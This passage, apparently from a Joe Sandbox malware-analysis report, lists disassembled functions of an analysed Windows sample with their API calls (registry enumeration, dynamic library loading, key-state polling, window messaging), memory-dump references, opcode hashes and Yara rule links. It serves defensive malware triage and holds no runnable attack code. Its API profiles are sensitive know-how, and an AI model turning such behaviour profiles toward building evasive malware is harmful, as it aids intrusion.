                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                          • String ID: %s%d
                                          • API String ID: 1941087503-1110647743
                                          • Opcode ID: be52ad9a9bf1b667a2c69440c4d3f13afde6db3bbdc63bb2a4c733b470e8bdbb
                                          • Instruction ID: c8eae8b44cc7779c8fe59977b96d861147d71dbc29db4f0c52caa39491029207
                                          • Opcode Fuzzy Hash: be52ad9a9bf1b667a2c69440c4d3f13afde6db3bbdc63bb2a4c733b470e8bdbb
                                          • Instruction Fuzzy Hash: 27116D71600319ABDF11BF64EC85FEA37A9EF48701F0850B6F908BA152DA7059458B75
                                          Function 00E32017 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
                                          Download Yara Rule
                                          APIs
                                          • CharUpperBuffW.USER32(?,?), ref: 00E32048
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: BuffCharUpper
                                          • String ID: APPEND$EXISTS$KEYS$REMOVE
                                          • API String ID: 3964851224-769500911
                                          • Opcode ID: 1f963f0d7d8d7037246db4ccd0072c1c6a03fe667058666bc25aeafc41a6b917
                                          • Instruction ID: c8eebd99c5b04463cf73cdf630c0826e627b6b9ee6895202af14e9617c1df063
                                          • Opcode Fuzzy Hash: 1f963f0d7d8d7037246db4ccd0072c1c6a03fe667058666bc25aeafc41a6b917
                                          • Instruction Fuzzy Hash: BE115E709001198FCF14EFA4D8554FEBBB4FF56304F109469D99977262EB32690ACF60
                                          Function 00E4EE69 Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                                          Download Yara Rule
                                          APIs
                                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00E4EF1B
                                          • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00E4EF4B
                                          • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00E4F07E
                                          • CloseHandle.KERNEL32(?), ref: 00E4F0FF
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                          • String ID:
                                          • API String ID: 2364364464-0
                                          • Opcode ID: 91c0d2a12efec676091381946baafed21cc3d127dd192450bc88764b95752e2d
                                          • Instruction ID: bab34e0cc088dc2ad4da54d4dda54cec826b69a9b9ec3e3633d7ae3a0e981254
                                          • Opcode Fuzzy Hash: 91c0d2a12efec676091381946baafed21cc3d127dd192450bc88764b95752e2d
                                          • Instruction Fuzzy Hash: 6E8182B16003109FD720EF28D856F2AB7E5EF88B10F04981EF595EB392DB71AC008B61
                                          Function 00E502C2 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DD7F41: _memmove.LIBCMT ref: 00DD7F82
                                            • Part of subcall function 00E510A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E50038,?,?), ref: 00E510BC
                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E50388
                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00E503C7
                                          • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00E5040E
                                          • RegCloseKey.ADVAPI32(?,?), ref: 00E5043A
                                          • RegCloseKey.ADVAPI32(00000000), ref: 00E50447
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                          • String ID:
                                          • API String ID: 3440857362-0
                                          • Opcode ID: 198823531b1baaf31577e16b9d9343f8afae34ca8095d1254505ceb326950b02
                                          • Instruction ID: e45858235c0a3516136e3e8f9a09068f94eaf3c392bbb66e7179e690a629e7d9
                                          • Opcode Fuzzy Hash: 198823531b1baaf31577e16b9d9343f8afae34ca8095d1254505ceb326950b02
                                          • Instruction Fuzzy Hash: 7D513971208204AFD704EF64DC91E6EB7E8FF84315F04996EF995A7291DB31E908CB62
                                          Function 00E4DBDC Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DD9997: __itow.LIBCMT ref: 00DD99C2
                                            • Part of subcall function 00DD9997: __swprintf.LIBCMT ref: 00DD9A0C
                                          • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00E4DC3B
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00E4DCBE
                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00E4DCDA
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00E4DD1B
                                          • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00E4DD35
                                            • Part of subcall function 00DD5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00E37B20,?,?,00000000), ref: 00DD5B8C
                                            • Part of subcall function 00DD5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00E37B20,?,?,00000000,?,?), ref: 00DD5BB0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                          • String ID:
                                          • API String ID: 327935632-0
                                          • Opcode ID: 9f1e34d25e2543a4468b740a64dd2a4415e0a5f72d95fba0ba003887d1e5f58d
                                          • Instruction ID: 279b84f007213f18981d22ff08e57c012a59d9cee909165465e4733365b7710e
                                          • Opcode Fuzzy Hash: 9f1e34d25e2543a4468b740a64dd2a4415e0a5f72d95fba0ba003887d1e5f58d
                                          • Instruction Fuzzy Hash: AD512735A04605DFCB04EF68D8949ADF7F4FF48314B0591AAE819AB312DB31AD45CFA1
                                          Function 00E3E7DC Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00E3E88A
                                          • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00E3E8B3
                                          • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00E3E8F2
                                            • Part of subcall function 00DD9997: __itow.LIBCMT ref: 00DD99C2
                                            • Part of subcall function 00DD9997: __swprintf.LIBCMT ref: 00DD9A0C
                                          • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00E3E917
                                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00E3E91F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                          • String ID:
                                          • API String ID: 1389676194-0
                                          • Opcode ID: d7bd94b168fa09c7d3f2c2f9d1e5905b5a906cbc9791c2ec322631ed0a5c6680
                                          • Instruction ID: 5996fb99cc3de03f2efc2e4b99308a2e77cb90b279e4b8a82c958b2a0a9331e7
                                          • Opcode Fuzzy Hash: d7bd94b168fa09c7d3f2c2f9d1e5905b5a906cbc9791c2ec322631ed0a5c6680
                                          • Instruction Fuzzy Hash: 9D512A39A00205EFCB05EF64C995AAEBBF5EF08314F149499E849AB361CB31ED51DF60
                                          Function 00E5A2C5 Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 43d36f160e1f3b53ccd9d9db1ed4e358118630cfd6296de7b486071253597d05
                                          • Instruction ID: 63256e561d76c01c06ada4c2699f75da816afc488cb9a577d8266c0294830ea9
                                          • Opcode Fuzzy Hash: 43d36f160e1f3b53ccd9d9db1ed4e358118630cfd6296de7b486071253597d05
                                          • Instruction Fuzzy Hash: E641E335900204AFC724DB68CC48FADBBA5EB0931AF181A76FD55B72E0D7709D49CA51
                                          Function 00DD2344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetCursorPos.USER32(?), ref: 00DD2357
                                          • ScreenToClient.USER32(00E967B0,?), ref: 00DD2374
                                          • GetAsyncKeyState.USER32(00000001), ref: 00DD2399
                                          • GetAsyncKeyState.USER32(00000002), ref: 00DD23A7
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: AsyncState$ClientCursorScreen
                                          • String ID:
                                          • API String ID: 4210589936-0
                                          • Opcode ID: cb00c36e9f3a548547e7a2e5f988aea432561e39a5c818fe2d47ab452771bb7c
                                          • Instruction ID: 41a1ced158b9561c6757db399fa4e6a068c7d69f3fe305a6fca427a9e3de539b
                                          • Opcode Fuzzy Hash: cb00c36e9f3a548547e7a2e5f988aea432561e39a5c818fe2d47ab452771bb7c
                                          • Instruction Fuzzy Hash: 0E41AF31504119FFCF199FA8CC44AEDBB74FB05364F20435AF828A22E0C730A994DBA1
                                          Function 00E26920 Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E2695D
                                          • TranslateAcceleratorW.USER32(?,?,?), ref: 00E269A9
                                          • TranslateMessage.USER32(?), ref: 00E269D2
                                          • DispatchMessageW.USER32(?), ref: 00E269DC
                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E269EB
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Message$PeekTranslate$AcceleratorDispatch
                                          • String ID:
                                          • API String ID: 2108273632-0
                                          • Opcode ID: 84d909add3cf826ad09584a4a08454bebf05625c8b2a5dcf99af9b3f9230d1f7
                                          • Instruction ID: 49b1fed2595b13b60026ef506d774f74c3f60f31f7f5b5f5721126957b5f2b89
                                          • Opcode Fuzzy Hash: 84d909add3cf826ad09584a4a08454bebf05625c8b2a5dcf99af9b3f9230d1f7
                                          • Instruction Fuzzy Hash: D531C571500266AFDB24CFB5EC84BF67BACAB41308F145667E422F31A1DB749889D7A0
                                          Function 00E28F01 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetWindowRect.USER32(?,?), ref: 00E28F12
                                          • PostMessageW.USER32(?,00000201,00000001), ref: 00E28FBC
                                          • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00E28FC4
                                          • PostMessageW.USER32(?,00000202,00000000), ref: 00E28FD2
                                          • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00E28FDA
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: MessagePostSleep$RectWindow
                                          • String ID:
                                          • API String ID: 3382505437-0
                                          • Opcode ID: f7a0f4df52290cb1a8756c90e92e1d789d77fd782541e8ea8913f06a98154029
                                          • Instruction ID: d834f866939d1fc329568cc058a790accadcbef4fdd87e5e25ccfd1414e1c64f
                                          • Opcode Fuzzy Hash: f7a0f4df52290cb1a8756c90e92e1d789d77fd782541e8ea8913f06a98154029
                                          • Instruction Fuzzy Hash: 7231BF7160122DEFEB14CF68EB48A9E7BB6FB04316F104229F925A71D0C7B09914DB91
                                          Function 00E2B6AF Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • IsWindowVisible.USER32(?), ref: 00E2B6C7
                                          • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00E2B6E4
                                          • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00E2B71C
                                          • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00E2B742
                                          • _wcsstr.LIBCMT ref: 00E2B74C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                          • String ID:
                                          • API String ID: 3902887630-0
                                          • Opcode ID: c51183d23cbbcde45b2297539f14fc4f11cb8693666f677697c81d3b6c3c6a88
                                          • Instruction ID: 7281db15e8d4dd673a4803a0c2967332a2e02e9ffb5f86f1c02ea90e48f90fe7
                                          • Opcode Fuzzy Hash: c51183d23cbbcde45b2297539f14fc4f11cb8693666f677697c81d3b6c3c6a88
                                          • Instruction Fuzzy Hash: C1212931204254BBEB255B39EC49E7B7BACDF49711F01813AFD05EA1A1EF61DC4092B0
                                          Function 00E5B405 Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DD2612: GetWindowLongW.USER32(?,000000EB), ref: 00DD2623
                                          • GetWindowLongW.USER32(?,000000F0), ref: 00E5B44C
                                          • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00E5B471
                                          • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00E5B489
                                          • GetSystemMetrics.USER32(00000004), ref: 00E5B4B2
                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00E41184,00000000), ref: 00E5B4D0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Window$Long$MetricsSystem
                                          • String ID:
                                          • API String ID: 2294984445-0
                                          • Opcode ID: dce861177ec74e8a42807c66eaac4d351405dd8605376f3a2e936b72bf6f39f9
                                          • Instruction ID: eb443460002bba5283da32e2b18022f5ae08c00f2781372f86a723a77b58fb2e
                                          • Opcode Fuzzy Hash: dce861177ec74e8a42807c66eaac4d351405dd8605376f3a2e936b72bf6f39f9
                                          • Instruction Fuzzy Hash: 58218031510255AFCB349F398C44A6A37A4EB05726F115F29FD36E71E1F7309818DB90
                                          Function 00E297E9 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00E29802
                                            • Part of subcall function 00DD7D2C: _memmove.LIBCMT ref: 00DD7D66
                                          • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00E29834
                                          • __itow.LIBCMT ref: 00E2984C
                                          • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00E29874
                                          • __itow.LIBCMT ref: 00E29885
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: MessageSend$__itow$_memmove
                                          • String ID:
                                          • API String ID: 2983881199-0
                                          • Opcode ID: f9d19b365ca1bb166d178fad5b15e4131dbbf1ee37aa39edd0251ed4404bba07
                                          • Instruction ID: c0eb3f66efe63f2ca25392f4ee89fff8170e0087ef16ba1bedcdad8095bbf8f5
                                          • Opcode Fuzzy Hash: f9d19b365ca1bb166d178fad5b15e4131dbbf1ee37aa39edd0251ed4404bba07
                                          • Instruction Fuzzy Hash: 4121F831B00318ABDB18AB61AC86EEE3BA9DF49714F086025FD05FB242D6708D4587E1
                                          Function 00DD12F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                          Download Yara Rule
                                          APIs
                                          • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00DD134D
                                          • SelectObject.GDI32(?,00000000), ref: 00DD135C
                                          • BeginPath.GDI32(?), ref: 00DD1373
                                          • SelectObject.GDI32(?,00000000), ref: 00DD139C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: ObjectSelect$BeginCreatePath
                                          • String ID:
                                          • API String ID: 3225163088-0
                                          • Opcode ID: 4ba1e5da3747bf1823906bf8b675e45c351a9ea8385efe93b271c7caf22cbae7
                                          • Instruction ID: f2966e3f5481319c2920cbfca16885376729610941042e988e4b759fb6bab772
                                          • Opcode Fuzzy Hash: 4ba1e5da3747bf1823906bf8b675e45c351a9ea8385efe93b271c7caf22cbae7
                                          • Instruction Fuzzy Hash: 49213374800308EFDB259F66EC057697BB9FB10362F188227F814B66A0D7719999DBA0
                                          Function 00E2C161 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
